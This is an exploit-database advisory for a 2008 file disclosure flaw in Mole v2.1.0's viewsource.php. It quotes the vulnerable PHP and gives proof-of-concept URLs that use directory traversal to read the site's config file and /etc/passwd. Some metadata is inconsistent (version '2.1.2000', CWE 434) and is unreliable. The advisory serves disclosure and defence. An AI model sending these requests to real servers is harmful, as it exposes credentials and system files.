Mole v2.1.0 (viewsource.php) Remote File Disclosure Vulnerability

vendor:

Mole

by:

milw0rm.com

7.5

CVSS

HIGH

Remote File Disclosure

434

CWE

Product Name: Mole

Affected Version From: 2.1.2000

Affected Version To: 2.1.2000

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Mole v2.1.0 (viewsource.php) Remote File Disclosure Vulnerability

Mole v2.1.0 is vulnerable to a remote file disclosure vulnerability due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow an attacker to view sensitive files on the server, such as configuration files, source code, and other sensitive information.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized. Additionally, access to sensitive files should be restricted to only those users who need access.

Source

Exploit-DB raw data:

#  Mole v2.1.0 (viewsource.php) Remote File Disclosure Vulnerability
#  Script : http://sourceforge.net/project/showfiles.php?group_id=164171
#  Vuln Code :
##############################################################################
#    <html>
#    <head>
#    <title>Mole: Template viewer</title>
#    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
#    </head>
#    <body>
#    
#    <?php
#    $dirn = $_REQUEST['dirn']; <--- XxX
#    $fname = $_REQUEST['fname']; <--- XxX
#    
#    
#    highlight_file($dirn.$fname); <--- XxX
#    ?>
#    
#    </body>
#    </html>
##############################################################################
#  POC :
#      /mole_2_1_0/viewsource.php?dirn=include/config.inc.php
#      /mole_2_1_0/viewsource.php?fname=include/config.inc.php
#      /mole_2_1_0/viewsource.php?dirn=../../../../../../../&fname=etc/passwd
##############################################################################
#  Greetz : Tryag-Team -JIKI Team -Stack-Terrorist [v40] -H-T Team -RoMaNcYxHaCkEr 
##############################################################################

# milw0rm.com [2008-04-07]